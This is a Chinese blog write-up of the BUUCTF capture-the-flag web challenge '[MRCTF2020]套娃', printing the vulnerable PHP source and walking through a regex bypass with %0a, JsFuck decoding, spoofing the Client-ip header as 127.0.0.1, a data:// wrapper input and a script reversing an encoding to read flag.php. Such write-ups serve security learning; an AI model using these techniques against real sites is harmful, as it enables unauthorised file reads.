BUUCTF:[MRCTF2020]套娃

最新推荐文章于 2023-10-12 22:13:49 发布
最新推荐文章于 2023-10-12 22:13:49 发布
阅读量843 收藏 1
点赞数
分类专栏: CTF_WEB_Writeup 文章标签: MRCTF2020
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/133044538
版权

查看源码发现

在这里插入图片描述

PHP非法参数名传参问题,详细请参考我的这篇文章:谈一谈PHP中关于非法参数名传参问题

正则这里绕过使用%0a换行符绕过,payload: /?b.u.p.t=23333%0a

得到下一步信息:secrettw.php

在这里插入图片描述

注释中的是JsFuck,用这个网站去运行即可得到信息:https://jsfuck.com

在这里插入图片描述

POST传个Merak=mochu7即可查看源码

<?php 
error_reporting(0); 
include 'takeip.php';
ini_set('open_basedir','.'); 
include 'flag.php';

if(isset($_POST['Merak'])){ 
    highlight_file(__FILE__); 
    die(); 
} 


function change($v){ 
    $v = base64_decode($v); 
    $re = ''; 
    for($i=0;$i<strlen($v);$i++){ 
        $re .= chr ( ord ($v[$i]) + $i*2 ); 
    } 
    return $re; 
}
echo 'Local access only!'."<br/>";
$ip = getIp();
if($ip!='127.0.0.1')
echo "Sorry,you don't have permission!  Your ip is :".$ip;
if($ip === '127.0.0.1' && file_get_contents($_GET['2333']) === 'todat is a happy day' ){
echo "Your REQUEST is:".change($_GET['file']);
echo file_get_contents(change($_GET['file'])); }
?>

这里这个getIp()尝试过常见的XFF绕过方法无效,这里也不知道takeip.php,也是看别人的Writeup才知道要添加一个Client-ip请求字段,至于file_get_contents($_GET['2333']) === 'todat is a happy day' 都是老生常谈的考点了,伪协议php://或者data://传入即可。

至于change($_GET['file']),逆一下change()方法,即可控制file_get_contents()读取文件

<?php 
function change($v) {
	$v = base64_decode($v);
	$re = '';
	for ($i=0; $i < strlen($v); $i++) { 
		$re .= chr(ord($v[$i]) + $i * 2);
	}
	return $re;
}

function unChange($v){
	$re = '';
	for ($i=0; $i < strlen($v); $i++) { 
		$re .= chr(ord($v[$i]) - $i * 2);
	}
	$re = base64_encode($re);
	return $re;
}

$data = "flag.php";
var_dump(Unchange($data));

 ?>

PS C:\Users\Administrator\Downloads> php .\code.php
C:\Users\Administrator\Downloads\code.php:22:
string(12) "ZmpdYSZmXGI="

注意需要添加个请求字段:Client-ip: 127.0.0.1

/secrettw.php?2333=data:text/plain,todat is a happy day&file=ZmpdYSZmXGI=

在这里插入图片描述

查看源码即可获得flag

在这里插入图片描述

末 初
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
产品方法论:俄罗斯套娃原理.docx
12-06
产品方法论:俄罗斯套娃原理.docx
ctf题集【BUUCTF MISC】[MRCTF2020]千层套路1
qq_42667028的博客
11-26 535
下载文件后,老规矩,查看属性并解压,发现有密码,扔ARCHPR里居然成功了。成功解压后是一个txt文件,内容类似是rbg格式,用脚本将rgb转为图片。密码是文件名,尝试过后发现是多个zip的套娃,用脚本解压吧。得到一个二维码图片,用QR扫一扫即可。
[MRCTF2020]套娃
yym68686
08-11 276
[MRCTF2020]套娃 打开网页,没有发现什么特别的,按F12打开开发者工具,查看源代码,发现注释: <!-- //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && pr
BUUCTF:[MRCTF2020]千层套路
末初的CSDN博客
11-09 3370
https://buuoj.cn/challenges#[MRCTF2020]%E5%8D%83%E5%B1%82%E5%A5%97%E8%B7%AF 套娃题,拿脚本解压 import zipfile name = '0573' while True: fz = zipfile.ZipFile(name + '.zip', 'r') fz.extractall(pwd=bytes(name, 'utf-8')) name = fz.filelist[0].filename[0:
BUUCTF--[MRCTF2020]套娃&[WUSTCTF2020]颜值成绩查询
weixin_44016181的博客
10-12 185
BUUCTF--[MRCTF2020]套娃&[WUSTCTF2020]颜值成绩查询,两道buuctf的练习题。python脚本实现比较简单,模板化python真的不要太爽~~
BUUCTF】[MRCTF2020]套娃
pofesser的博客
01-19 2953
思考 题目是套娃,感觉应该是一环一环的走下去,每个问题应该不是很难,按着他的提示做吧。 知识点 刷题 刷题的时候,习惯先查看robots.txt是否有敏感信息,然后查看源码。如果这个时候,都没有尝试爆目录了。 查看robots.txt无信息,查看源码。 ![在这里插入图片描述](https://img-blog.csdnimg.cn/8d8ab23f032845a691d260644c24d003.png?x-oss-process=image/watermark,type_d3F5LXplbmhl
BUUCTF之[MRCTF2020]套娃 --- 文件包含漏洞
weixin_44632787的博客
06-27 705
BUUCTF之[MRCTF2020]套娃 题目 发现什么都没有,于是鼠标右键查看一下提示。 可以看到PHP代码 <?php //1st $query = $_SERVER['QUERY_STRING']; if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' &
[MRCTF2020]套娃 ctf web buuctf
wuyaowangchuan的博客
11-11 1040
打开之后 源代码 $query = $_SERVER['QUERY_STRING'];// if( substr_count($query, '_') !== 0 || substr_count($query, '%5f') != 0 ){ die('Y0u are So cutE!'); } if($_GET['b_u_p_t'] !== '23333' && preg_match('/^23333$/', $_GET['b_u_p_t'])){ echo "y.
审计练习16——[MRCTF2020]套娃
qq_43756333的博客
06-12 412
平台:buuoj.cn 打开靶机源码处php代码 第一个if如果传入的参数出现_和它的url编码%5f,则打印Y0u are So cutE! 绕过:用.或空格代替_ 第二个if要b_u_r_t的值为23333但添加了正则匹配,用^和$来界定23333的首尾,代表了“行的开头和结尾”,只匹配一行,因此%0a换行绕过 打开secrettw.php 提示本地,xff不行,用client-ip 下面的jsfuck代码直接控制台输出 那么就post一个Merak随便传个值 回显php,代码如下 <?
俄罗斯套娃程序及设计
06-09
2.在递归函数调用时记录路经(保存在向量path_now中),并记录当前的套娃总重(score_now)。 3.走过的没有套娃的路口,将其值修改为HPZD(即0XFFFFFFFF),表明该路口已走过。 4.当递归函数返回时恢复path_now和score...
俄罗斯套娃奖品Java程序
08-12
网上有套娃的VC程序,c程序,这是我改写的Java版本。
俄罗斯套娃奖品C++程序
05-19
非常经典的程序,曾是中兴“捧月杯”参赛程序。程序里面使用使用C++编程
俄罗斯套娃
04-17
俄罗斯套娃动作数据
通信电源蓄电池组容量性充放电试验三措一案.docx
04-27
5G通信行业、网络优化、通信工程建设资料。
铁塔维护检测手段.docx
04-27
5G通信行业、网络优化、通信工程建设资料
通信设备安装施工组织方案.doc
04-27
5G通信、网络优化与通信建设
299-教育行业信息化与数据平台建设分享.pptx
04-27
299-教育行业信息化与数据平台建设分享.pptx
手写数字和字母数据集binaryalphadigs.mat
最新发布
04-27
手写数字和字母数据集binaryalphadigs.mat
俄罗斯套娃c语言程序
02-15
俄罗斯套娃是一种传统的俄罗斯玩具,它由一组套在一起的木质人偶组成,每个人偶都可以打开,里面还有一个更小的人偶。如果你想在C语言中实现俄罗斯套娃程序,你可以使用结构体和指针来表示套娃的层次结构。 首先,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末 初

谢谢老板!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值